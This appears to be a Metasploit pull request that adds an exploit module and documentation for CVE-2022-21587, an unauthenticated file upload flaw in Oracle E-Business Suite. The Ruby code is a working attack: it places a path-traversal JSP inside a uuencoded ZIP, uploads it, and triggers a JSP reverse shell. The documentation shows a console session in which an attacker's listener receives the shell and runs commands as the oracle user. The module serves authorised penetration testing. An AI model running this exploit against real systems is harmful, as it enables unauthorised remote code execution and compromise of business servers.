### PR TITLE
Oracle E-Business Suite Exploit module - CVE-2022-21587 (ETR)

### DIFF
--- a/documentation/modules/exploit/linux/http/oracle_ebs_rce_cve_2022_21587.md
+++ b/documentation/modules/exploit/linux/http/oracle_ebs_rce_cve_2022_21587.md
@@ -1,0 +1,96 @@
+## Vulnerable Application
+
+This module exploits CVE-2022-21587, an arbitrary file upload vulnerability in Oracle Web Applications Desktop Integrator as shipped with Oracle E-Business Suite (EBS) versions 12.2.3 through to 12.2.11.
+
+The exploit uploads a Java Server Page (JSP) payload in order to achieve code execution and by default will use the `java/jsp_shell_reverse_tcp` payload.
+
+The Oracle EBS product is shipped as either a standalone appliance based on Linux, or an self hosted application supporting multiple platforms, including Linux, Windows, Solaris, AIX and HP-UP. This exploit module has been tested against the Linux based appliance, specifically version 12.2.10. 
+
+A full technical analysis of the vulnerability can be found on [AttackerKB](https://attackerkb.com/topics/Bkij5kK1qK/cve-2022-21587/rapid7-analysis).
+
+## Target Setup
+
+To setup the Oracle EBS appliance, you must download the appliance files, rebuild the appliance image and install the appliance as a [VirtualBox](https://www.virtualbox.org/) virtual machine.
+
+* Register an account at [Oracle E-Delivery](https://edelivery.oracle.com/osdc/faces/SoftwareDelivery) and login to search for the required software, specifically the `Oracle VM Virtual Appliance for Oracle E-Business Suite`.
+
+* You will be presented with multiple ZIP files to download. These files will be extracted and concatenated to create a single 70 GB Oracle Virtual Appliance (OVA) file. Instructions on how to do this, as well as additional configuration instructions, can be found in the extracted documentation located in `\V1005962-01\Documents\Oracle VM Virtual Appliance for Oracle E-Business Suite Deployment Guide_Release 12.2.10.html`. Additionally a step by step guide for installation and setup is available [here](https://blog.rishoradev.com/2021/04/12/oracle-ebs-r12-on-virtualbox/).
+
+* Import the OVA file into VirtualBox. Once this is completed you may power on the virtual appliance. You will require around 320 GB of hard disk space to complete this operation.
+
+* Follow the instructions displayed in the console to set the default passwords for the `root` and `oracle` and `applmgr` user accounts.
+
+* Once installation and setup has been completed, you can SSH into the appliance as the user `oracle` and start the database and application services with the following commands:
+
+  ```
+  cd /u01/install/APPS/scripts/
+  ./startdb.sh
+  ./startapps.sh
+  ```
+
+* You can now access the WebLogic server over HTTP port `8000`.
+
+## Verification Steps
+
+To exploit the vulnerability against a target Oracle EBS Linux based appliance, the following steps are performed.
+
+```
+msf6 > use exploit/linux/http/oracle_ebs_rce_cve_2022_21587 
+[*] Using configured payload java/jsp_shell_reverse_tcp
+msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) > show options
+
+Module options (exploit/linux/http/oracle_ebs_rce_cve_2022_21587):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metaspl
+                                       oit/basics/using-metasploit.html
+   RPORT    8000             yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (java/jsp_shell_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+   SHELL                   no        The system shell to use.
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Oracle EBS on Linux
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) > set RHOST 192.168.86.37
+RHOST => 192.168.86.37
+msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) > set LHOST 192.168.86.5
+LHOST => 192.168.86.5
+msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) > check
+
+[*] Target is running version 12.2.10
+[*] 192.168.86.37:8000 - The target appears to be vulnerable.
+msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) > exploit
+
+[*] Started reverse TCP handler on 192.168.86.5:4444 
+[*] Targeting the endpoint: /OA_HTML/BneUploaderService
+[*] Triggering the payload...
+[+] Deleted /u01/install/APPS/fs1/FMW_Home/Oracle_EBS-app1/applications/forms/forms/ygrne.jsp
+[*] Command shell session 1 opened (192.168.86.5:4444 -> 192.168.86.37:59288) at 2023-02-10 12:20:43 +0000
+
+id
+uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall),54322(dba) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
+uname -a
+Linux apps 3.10.0-1160.11.1.el7.x86_64 #1 SMP Tue Dec 15 11:58:45 PST 2020 x86_64 x86_64 x86_64 GNU/Linux
+exit
+[*] 192.168.86.37 - Command shell session 1 closed.
+msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) >
+```

--- a/documentation/modules/exploit/linux/http/oracle_ebs_rce_cve_2022_21587.md
+++ b/documentation/modules/exploit/linux/http/oracle_ebs_rce_cve_2022_21587.md
@@ -1,11 +1,11 @@
 ## Vulnerable Application
 
-This module exploits CVE-2022-21587, an arbitrary file upload vulnerability in Oracle
+This module exploits CVE-2022-21587, an unauthenticated arbitrary file upload vulnerability in Oracle
 Web Applications Desktop Integrator as shipped with Oracle E-Business Suite (EBS) versions
 12.2.3 through to 12.2.11.
 
-The exploit uploads a Java Server Page (JSP) payload in order to achieve code execution and
-by default will use the `java/jsp_shell_reverse_tcp` payload.
+The exploit uploads a Java Server Page (JSP) payload in order to achieve code execution
+as the `oracle` user, and will use the `java/jsp_shell_reverse_tcp` payload by default.
 
 The Oracle EBS product is shipped as either a standalone appliance based on Linux, or an self
 hosted application supporting multiple platforms, including Linux, Windows, Solaris, AIX and
@@ -64,7 +64,7 @@ HTTP and 4443 for HTTPS. If using HTTPS set `SSL` to `true`.
 
 ## Scenarios
 
-### Oracle E-Business Suite 12.2.10 Linux based appliance
+### Oracle E-Business Suite 12.2.10 - Oracle Virtual Appliance (OVA)
 
 ```
 msf6 > use exploit/linux/http/oracle_ebs_rce_cve_2022_21587 

--- a/documentation/modules/exploit/linux/http/oracle_ebs_rce_cve_2022_21587.md
+++ b/documentation/modules/exploit/linux/http/oracle_ebs_rce_cve_2022_21587.md
@@ -36,11 +36,18 @@ You will require around 320 GB of hard disk space to complete this operation. No
 if the IP address for the appliance changed after the initial install. It is recommended to use either a
 static IP address or ensure your DHCP server provides the same address to the appliance.
 
-* Follow the instructions displayed in the console to set the default passwords for the `root`
-and `oracle` and `applmgr` user accounts.
+* When booting the virtual appliance you will be asked to select a Linux kernel to boot from. The option
+`Oracle Linux Server 7.9, with Linux 3.10.0-1160.11.1.e17.x86_64` was chosen during testing.
+
+* Upon booting the virtual appliance for the first time you will be asked to login. Enter the username `root`
+and follow the instructions displayed in the console to set the default passwords for the `root` and
+`oracle` and `applmgr` user accounts. If asked to install the VISION demo instance, enter `VISION` to install
+the demo data.
 
 * Once installation and setup has been completed, you can SSH into the appliance as the user
-`oracle` and start the database and application services with the following commands:
+`oracle` and start the database and application services with the following commands. Note, it has been observed that
+when starting the apps, some may timeout when starting (an error will be displayed in the console), and may require
+running `startapps.sh` a second time.
 
 ```
 cd /u01/install/APPS/scripts/

--- a/documentation/modules/exploit/linux/http/oracle_ebs_rce_cve_2022_21587.md
+++ b/documentation/modules/exploit/linux/http/oracle_ebs_rce_cve_2022_21587.md
@@ -1,38 +1,67 @@
 ## Vulnerable Application
 
-This module exploits CVE-2022-21587, an arbitrary file upload vulnerability in Oracle Web Applications Desktop Integrator as shipped with Oracle E-Business Suite (EBS) versions 12.2.3 through to 12.2.11.
+This module exploits CVE-2022-21587, an arbitrary file upload vulnerability in Oracle
+Web Applications Desktop Integrator as shipped with Oracle E-Business Suite (EBS) versions
+12.2.3 through to 12.2.11.
 
-The exploit uploads a Java Server Page (JSP) payload in order to achieve code execution and by default will use the `java/jsp_shell_reverse_tcp` payload.
+The exploit uploads a Java Server Page (JSP) payload in order to achieve code execution and
+by default will use the `java/jsp_shell_reverse_tcp` payload.
 
-The Oracle EBS product is shipped as either a standalone appliance based on Linux, or an self hosted application supporting multiple platforms, including Linux, Windows, Solaris, AIX and HP-UP. This exploit module has been tested against the Linux based appliance, specifically version 12.2.10. 
+The Oracle EBS product is shipped as either a standalone appliance based on Linux, or an self
+hosted application supporting multiple platforms, including Linux, Windows, Solaris, AIX and
+HP-UP. This exploit module has been tested against the Linux based appliance, specifically
+version 12.2.10.
 
-A full technical analysis of the vulnerability can be found on [AttackerKB](https://attackerkb.com/topics/Bkij5kK1qK/cve-2022-21587/rapid7-analysis).
+A full technical analysis of the vulnerability can be found on
+[AttackerKB](https://attackerkb.com/topics/Bkij5kK1qK/cve-2022-21587/rapid7-analysis).
 
 ## Target Setup
 
-To setup the Oracle EBS appliance, you must download the appliance files, rebuild the appliance image and install the appliance as a [VirtualBox](https://www.virtualbox.org/) virtual machine.
+To setup the Oracle EBS appliance, you must download the appliance files, rebuild the appliance
+image and install the appliance as a [VirtualBox](https://www.virtualbox.org/) virtual machine.
 
-* Register an account at [Oracle E-Delivery](https://edelivery.oracle.com/osdc/faces/SoftwareDelivery) and login to search for the required software, specifically the `Oracle VM Virtual Appliance for Oracle E-Business Suite`.
+* Register an account at [Oracle E-Delivery](https://edelivery.oracle.com/osdc/faces/SoftwareDelivery)
+and login to search for the required software, specifically the `Oracle VM Virtual Appliance for
+Oracle E-Business Suite`.
 
-* You will be presented with multiple ZIP files to download. These files will be extracted and concatenated to create a single 70 GB Oracle Virtual Appliance (OVA) file. Instructions on how to do this, as well as additional configuration instructions, can be found in the extracted documentation located in `\V1005962-01\Documents\Oracle VM Virtual Appliance for Oracle E-Business Suite Deployment Guide_Release 12.2.10.html`. Additionally a step by step guide for installation and setup is available [here](https://blog.rishoradev.com/2021/04/12/oracle-ebs-r12-on-virtualbox/).
+* You will be presented with multiple ZIP files to download. These files will be extracted and
+concatenated to create a single 70 GB Oracle Virtual Appliance (OVA) file. Instructions on how
+to do this, as well as additional configuration instructions, can be found in the extracted
+documentation located in `\V1005962-01\Documents\Oracle VM Virtual Appliance for Oracle E-Business
+Suite Deployment Guide_Release 12.2.10.html`. Additionally a step by step guide for installation
+and setup is available [here](https://blog.rishoradev.com/2021/04/12/oracle-ebs-r12-on-virtualbox/).
 
-* Import the OVA file into VirtualBox. Once this is completed you may power on the virtual appliance. You will require around 320 GB of hard disk space to complete this operation.
+* Import the OVA file into VirtualBox. Once this is completed you may power on the virtual appliance.
+You will require around 320 GB of hard disk space to complete this operation.
 
-* Follow the instructions displayed in the console to set the default passwords for the `root` and `oracle` and `applmgr` user accounts.
+* Follow the instructions displayed in the console to set the default passwords for the `root`
+and `oracle` and `applmgr` user accounts.
 
-* Once installation and setup has been completed, you can SSH into the appliance as the user `oracle` and start the database and application services with the following commands:
+* Once installation and setup has been completed, you can SSH into the appliance as the user
+`oracle` and start the database and application services with the following commands:
 
-  ```
-  cd /u01/install/APPS/scripts/
-  ./startdb.sh
-  ./startapps.sh
-  ```
+```
+cd /u01/install/APPS/scripts/
+./startdb.sh
+./startapps.sh
+```
 
 * You can now access the WebLogic server over HTTP port `8000`.
 
 ## Verification Steps
 
-To exploit the vulnerability against a target Oracle EBS Linux based appliance, the following steps are performed.
+From msfconsole perform the following steps:
+
+1. `use exploit/linux/http/oracle_ebs_rce_cve_2022_21587`
+2. Set `RHOST` to the target address. The default `RPORT` is 8000.
+3. Set `LHOST` and `LPORT` values for the default `java/jsp_shell_reverse_tcp` payload.
+4. `check` to ensure the target is vulnerable.
+5. `exploit`
+6. Verify a command session has been opened and you can execute commands as the `oracle` user.
+
+## Scenarios
+
+### Oracle E-Business Suite 12.2.10 Linux based appliance
 
 ```
 msf6 > use exploit/linux/http/oracle_ebs_rce_cve_2022_21587 
@@ -75,9 +104,7 @@ RHOST => 192.168.86.37
 msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) > set LHOST 192.168.86.5
 LHOST => 192.168.86.5
 msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) > check
-
-[*] Target is running version 12.2.10
-[*] 192.168.86.37:8000 - The target appears to be vulnerable.
+[*] 192.168.86.37:8000 - The target appears to be vulnerable. Oracle EBS version 12.2.10 detected.
 msf6 exploit(linux/http/oracle_ebs_rce_cve_2022_21587) > exploit
 
 [*] Started reverse TCP handler on 192.168.86.5:4444 

--- a/documentation/modules/exploit/linux/http/oracle_ebs_rce_cve_2022_21587.md
+++ b/documentation/modules/exploit/linux/http/oracle_ebs_rce_cve_2022_21587.md
@@ -21,8 +21,8 @@ To setup the Oracle EBS appliance, you must download the appliance files, rebuil
 image and install the appliance as a [VirtualBox](https://www.virtualbox.org/) virtual machine.
 
 * Register an account at [Oracle E-Delivery](https://edelivery.oracle.com/osdc/faces/SoftwareDelivery)
-and login to search for the required software, specifically the `Oracle VM Virtual Appliance for
-Oracle E-Business Suite`.
+and login to search for the required software. You will need to search for `REL: Oracle VM Virtual Appliance for
+Oracle E-Business Suite` to find the appropriate download links. The version number should be listed at the end of the link.
 
 * You will be presented with multiple ZIP files to download. These files will be extracted and
 concatenated to create a single 70 GB Oracle Virtual Appliance (OVA) file. Instructions on how
@@ -49,6 +49,8 @@ cd /u01/install/APPS/scripts/
 ```
 
 * You can now access the WebLogic server over HTTP port `8000`.
+
+## Options
 
 ## Verification Steps
 

--- a/documentation/modules/exploit/linux/http/oracle_ebs_rce_cve_2022_21587.md
+++ b/documentation/modules/exploit/linux/http/oracle_ebs_rce_cve_2022_21587.md
@@ -32,7 +32,9 @@ Suite Deployment Guide_Release 12.2.10.html`. Additionally a step by step guide 
 and setup is available [here](https://blog.rishoradev.com/2021/04/12/oracle-ebs-r12-on-virtualbox/).
 
 * Import the OVA file into VirtualBox. Once this is completed you may power on the virtual appliance.
-You will require around 320 GB of hard disk space to complete this operation.
+You will require around 320 GB of hard disk space to complete this operation. Note, issues were encountered
+if the IP address for the appliance changed after the initial install. It is recommended to use either a
+static IP address or ensure your DHCP server provides the same address to the appliance.
 
 * Follow the instructions displayed in the console to set the default passwords for the `root`
 and `oracle` and `applmgr` user accounts.
@@ -53,7 +55,8 @@ cd /u01/install/APPS/scripts/
 From msfconsole perform the following steps:
 
 1. `use exploit/linux/http/oracle_ebs_rce_cve_2022_21587`
-2. Set `RHOST` to the target address. The default `RPORT` is 8000.
+2. Set `RHOST` to the target address and `RPORT` to the target port. The default `RPORT` is 8000 for
+HTTP and 4443 for HTTPS. If using HTTPS set `SSL` to `true`.
 3. Set `LHOST` and `LPORT` values for the default `java/jsp_shell_reverse_tcp` payload.
 4. `check` to ensure the target is vulnerable.
 5. `exploit`

--- a/modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
+++ b/modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
@@ -94,10 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     jsp_name = Rex::Text.rand_text_alpha_lower(1..8) + '.jsp'
 
-    jsp_path = ''
-    1.upto(target['DirTraversalDepth']) do
-      jsp_path << '../'
-    end
+    jsp_path = '../' * target['DirTraversalDepth']
     jsp_path << "#{target['EBSFormsPath']}#{jsp_name}"
 
     jsp_absolute_path = "#{target['EBSBasePath']}#{target['EBSFormsPath']}#{jsp_name}"

--- a/modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
+++ b/modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
@@ -53,7 +53,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
-          'SideEffects' => [IOC_IN_LOGS]
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
         }
       )
     )

--- a/modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
+++ b/modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
@@ -7,6 +7,7 @@ require 'rex/zip'
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
+  prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::FileDropper
 
@@ -18,7 +19,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Description' => %q{
           This module exploits an arbitrary file upload vulnerability in Oracle Web Applications
           Desktop Integrator, as shipped with Oracle EBS versions 12.2.3 through to 12.2.11, in
-          order to gain remote code execution.
+          order to gain remote code execution as the oracle user.
         },
         'Author' => [
           'sf', # MSF Exploit & Rapid7 Analysis
@@ -97,7 +98,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status("Targeting the endpoint: #{target_url}")
 
-    jsp_name = Rex::Text.rand_text_alpha_lower(1..8) + '.jsp'
+    jsp_name = Rex::Text.rand_text_alpha_lower(3..8) + '.jsp'
 
     jsp_path = '../' * target['DirTraversalDepth']
     jsp_path << "#{target['EBSFormsPath']}#{jsp_name}"
@@ -107,11 +108,13 @@ class MetasploitModule < Msf::Exploit::Remote
     zip = Rex::Zip::Archive.new
     zip.add_file(jsp_path, payload.encoded)
 
-    uue_data = "begin 777 #{Rex::Text.rand_text_alpha_lower(1..8)}.zip\n"
+    # The ZIP file is expected to be encoded with the binary to text encoding mechanism called uuencode.
+    # For a detailed description refer the the Rapid7 AttackerKB analysis in the References section of this module.
+    uue_data = "begin 777 #{Rex::Text.rand_text_alpha_lower(3..8)}.zip\n"
     uue_data << [zip.pack].pack('u')
     uue_data << "end\n"
 
-    uue_name = "#{Rex::Text.rand_text_alpha_lower(1..8)}.uue"
+    uue_name = "#{Rex::Text.rand_text_alpha_lower(3..8)}.uue"
 
     mime = Rex::MIME::Message.new
     mime.add_part(uue_data, 'text/plain', nil, %(form-data; name="file"; filename="#{uue_name}"))

--- a/modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
+++ b/modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Oracle E-Business Suite (EBS) Arbitrary File Upload',
         'Description' => %q{
-          This module exploits and arbitrary file upload vulnerability in Oracle Web Applications
+          This module exploits an arbitrary file upload vulnerability in Oracle Web Applications
           Desktop Integrator, as shipped with Oracle EBS versions 12.2.3 through to 12.2.11, in
           order to gain remote code execution.
         },

--- a/modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
+++ b/modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
@@ -73,20 +73,21 @@ class MetasploitModule < Msf::Exploit::Remote
 
     return CheckCode::Unknown('Connection failed') unless res
 
-    if res.code == 200
-      m = res.body.match(%r{jsLibs/Common(\d+_\d+_\d+)})
-      if m && (m.length == 2)
-        version = Rex::Version.new(m[1].gsub('_', '.'))
-        print_status("Target is running version #{version}")
-        if version.between?(Rex::Version.new('12.2.3'), Rex::Version.new('12.2.11'))
-          return CheckCode::Appears
-        else
-          return CheckCode::Safe
-        end
+    return CheckCode::Unknown unless res.code == 200
+
+    m = res.body.match(%r{jsLibs/Common(\d+_\d+_\d+)})
+
+    if m && (m.length == 2)
+      version = Rex::Version.new(m[1].gsub('_', '.'))
+
+      if version.between?(Rex::Version.new('12.2.3'), Rex::Version.new('12.2.11'))
+        return CheckCode::Appears("Oracle EBS version #{version} detected.")
       end
+
+      return CheckCode::Safe("Oracle EBS version #{version} detected.")
     end
 
-    CheckCode::Unknown
+    CheckCode::Safe
   end
 
   def exploit

--- a/modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
+++ b/modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
@@ -116,7 +116,9 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi(
       {
         'method' => 'POST',
-        'uri' => "#{target_url}?bne:uueupload=true",
+        'uri' => target_url,
+        'vars_get' => { 'bne:uueupload' => 'true' },
+        'encode_params' => true,
         'ctype' => "multipart/form-data; boundary=#{mime.bound}",
         'data' => mime.to_s
       }

--- a/modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
+++ b/modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
@@ -43,8 +43,8 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Platform' => 'linux',
               'EBSBasePath' => '/u01/install/APPS/fs1/',
-              'EBSFormsPath' => 'FMW_Home/Oracle_EBS-app1/applications/forms/forms/',
-              'DirTraversalDepth' => 5
+              'EBSUploadPath' => 'EBSapps/appl/bne/12.0.0/upload/',
+              'EBSFormsPath' => 'FMW_Home/Oracle_EBS-app1/applications/forms/forms/'
             }
           ]
         ],
@@ -100,7 +100,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     jsp_name = Rex::Text.rand_text_alpha_lower(3..8) + '.jsp'
 
-    jsp_path = '../' * target['DirTraversalDepth']
+    jsp_path = '../' * target['EBSUploadPath'].split('/').length
+
     jsp_path << "#{target['EBSFormsPath']}#{jsp_name}"
 
     jsp_absolute_path = "#{target['EBSBasePath']}#{target['EBSFormsPath']}#{jsp_name}"
@@ -132,7 +133,9 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
 
-    fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless res && res.code == 200
+    unless res && res.code == 200 && res.body.include?('bne:text="Cannot be logged in as GUEST."')
+      fail_with(Failure::UnexpectedReply, 'Failed to upload the payload')
+    end
 
     print_status('Triggering the payload...')
 

--- a/modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
+++ b/modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
@@ -1,0 +1,137 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'rex/zip'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Oracle E-Business Suite (EBS) Arbitrary File Upload',
+        'Description' => %q{
+          This module exploits and arbitrary file upload vulnerability in Oracle Web Applications
+          Desktop Integrator, as shipped with Oracle EBS versions 12.2.3 through to 12.2.11, in
+          order to gain remote code execution.
+        },
+        'Author' => [
+          'sf', # MSF Exploit & Rapid7 Analysis
+          'HMs', # Python PoC
+          'l1k3beef', # Original Discoverer
+        ],
+        'References' => [
+          ['CVE', '2022-21587'],
+          ['URL', 'https://attackerkb.com/topics/Bkij5kK1qK/cve-2022-21587/rapid7-analysis'],
+          ['URL', 'https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/'],
+          ['URL', 'https://github.com/hieuminhnv/CVE-2022-21587-POC']
+        ],
+        'DisclosureDate' => '2022-10-01',
+        'License' => MSF_LICENSE,
+        'Platform' => %w[linux],
+        'Arch' => ARCH_JAVA,
+        'Privileged' => false, # Code execution as user 'oracle'
+        'Targets' => [
+          [
+            'Oracle EBS on Linux',
+            {
+              'Platform' => 'linux',
+              'EBSBasePath' => '/u01/install/APPS/fs1/',
+              'EBSFormsPath' => 'FMW_Home/Oracle_EBS-app1/applications/forms/forms/',
+              'DirTraversalDepth' => 5
+            }
+          ]
+        ],
+        'DefaultOptions' => {
+          'PAYLOAD' => 'java/jsp_shell_reverse_tcp'
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8000)
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => '/OA_HTML/FrmReportData'
+    )
+
+    if res && (res.code == 200)
+      m = res.body.match(%r{jsLibs/Common(\d+)_(\d+)_(\d+)})
+      if m && (m.length == 4)
+        if (m[1].to_i == 12) && (m[2].to_i == 2) && (m[3].to_i >= 3) && (m[3].to_i <= 11)
+          return CheckCode::Appears
+        else
+          return CheckCode::Safe
+        end
+      end
+    end
+
+    CheckCode::Unknown
+  end
+
+  def exploit
+
+    endpoints = %w[BneViewerXMLService BneDownloadService BneOfflineLOVService BneUploaderService]
+
+    target_url = "/OA_HTML/#{endpoints.sample}"
+
+    print_status("Targeting the endpoint: #{target_url}")
+
+    jsp_name = Rex::Text.rand_text_alpha_lower(1..8) + '.jsp'
+
+    jsp_path = ''
+    1.upto(target['DirTraversalDepth']) do
+      jsp_path << '../'
+    end
+    jsp_path << "#{target['EBSFormsPath']}#{jsp_name}"
+
+    jsp_absolute_path = "#{target['EBSBasePath']}#{target['EBSFormsPath']}#{jsp_name}"
+
+    zip = Rex::Zip::Archive.new
+    zip.add_file(jsp_path, payload.encoded)
+
+    uue_data = "begin 777 #{Rex::Text.rand_text_alpha_lower(1..8)}.zip\n"
+    uue_data << [zip.pack].pack('u')
+    uue_data << "end\n"
+
+    uue_name = "#{Rex::Text.rand_text_alpha_lower(1..8)}.uue"
+
+    mime = Rex::MIME::Message.new
+    mime.add_part(uue_data, 'text/plain', nil, %(form-data; name="file"; filename="#{uue_name}"))
+
+    register_file_for_cleanup(jsp_absolute_path)
+
+    res = send_request_cgi({
+                             'method' => 'POST',
+                             'uri' => "#{target_url}?bne:uueupload=true",
+                             'ctype' => "multipart/form-data; boundary=#{mime.bound}",
+                             'data' => mime.to_s
+                           })
+
+    fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless res && res.code == 200
+
+    print_status('Triggering the payload...')
+
+    send_request_cgi(
+      'method' => 'GET',
+      'uri' => "/forms/#{jsp_name}"
+    )
+  end
+
+end

--- a/modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
+++ b/modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
@@ -86,7 +86,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-
     endpoints = %w[BneViewerXMLService BneDownloadService BneOfflineLOVService BneUploaderService]
 
     target_url = "/OA_HTML/#{endpoints.sample}"
@@ -117,12 +116,14 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_file_for_cleanup(jsp_absolute_path)
 
-    res = send_request_cgi({
-                             'method' => 'POST',
-                             'uri' => "#{target_url}?bne:uueupload=true",
-                             'ctype' => "multipart/form-data; boundary=#{mime.bound}",
-                             'data' => mime.to_s
-                           })
+    res = send_request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => "#{target_url}?bne:uueupload=true",
+        'ctype' => "multipart/form-data; boundary=#{mime.bound}",
+        'data' => mime.to_s
+      }
+    )
 
     fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless res && res.code == 200
 

--- a/modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
+++ b/modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
@@ -71,10 +71,14 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => '/OA_HTML/FrmReportData'
     )
 
-    if res && (res.code == 200)
-      m = res.body.match(%r{jsLibs/Common(\d+)_(\d+)_(\d+)})
-      if m && (m.length == 4)
-        if (m[1].to_i == 12) && (m[2].to_i == 2) && (m[3].to_i >= 3) && (m[3].to_i <= 11)
+    return CheckCode::Unknown('Connection failed') unless res
+
+    if res.code == 200
+      m = res.body.match(%r{jsLibs/Common(\d+_\d+_\d+)})
+      if m && (m.length == 2)
+        version = Rex::Version.new(m[1].gsub('_', '.'))
+        print_status("Target is running version #{version}")
+        if version.between?(Rex::Version.new('12.2.3'), Rex::Version.new('12.2.11'))
           return CheckCode::Appears
         else
           return CheckCode::Safe

--- a/modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
+++ b/modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb
@@ -15,9 +15,9 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'Oracle E-Business Suite (EBS) Arbitrary File Upload',
+        'Name' => 'Oracle E-Business Suite (EBS) Unauthenticated Arbitrary File Upload',
         'Description' => %q{
-          This module exploits an arbitrary file upload vulnerability in Oracle Web Applications
+          This module exploits an unauthenticated arbitrary file upload vulnerability in Oracle Web Applications
           Desktop Integrator, as shipped with Oracle EBS versions 12.2.3 through to 12.2.11, in
           order to gain remote code execution as the oracle user.
         },
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Privileged' => false, # Code execution as user 'oracle'
         'Targets' => [
           [
-            'Oracle EBS on Linux',
+            'Oracle EBS on Linux (OVA Install)',
             {
               'Platform' => 'linux',
               'EBSBasePath' => '/u01/install/APPS/fs1/',
@@ -76,10 +76,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
     return CheckCode::Unknown unless res.code == 200
 
-    m = res.body.match(%r{jsLibs/Common(\d+_\d+_\d+)})
+    match = res.body.match(%r{jsLibs/Common(\d+_\d+_\d+)})
 
-    if m && (m.length == 2)
-      version = Rex::Version.new(m[1].gsub('_', '.'))
+    if match && (match.length == 2)
+      version = Rex::Version.new(match[1].gsub('_', '.'))
 
       if version.between?(Rex::Version.new('12.2.3'), Rex::Version.new('12.2.11'))
         return CheckCode::Appears("Oracle EBS version #{version} detected.")
@@ -109,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote
     zip.add_file(jsp_path, payload.encoded)
 
     # The ZIP file is expected to be encoded with the binary to text encoding mechanism called uuencode.
-    # For a detailed description refer the the Rapid7 AttackerKB analysis in the References section of this module.
+    # For a detailed description refer to the Rapid7 AttackerKB analysis in the References section of this module.
     uue_data = "begin 777 #{Rex::Text.rand_text_alpha_lower(3..8)}.zip\n"
     uue_data << [zip.pack].pack('u')
     uue_data << "end\n"


### PR DESCRIPTION
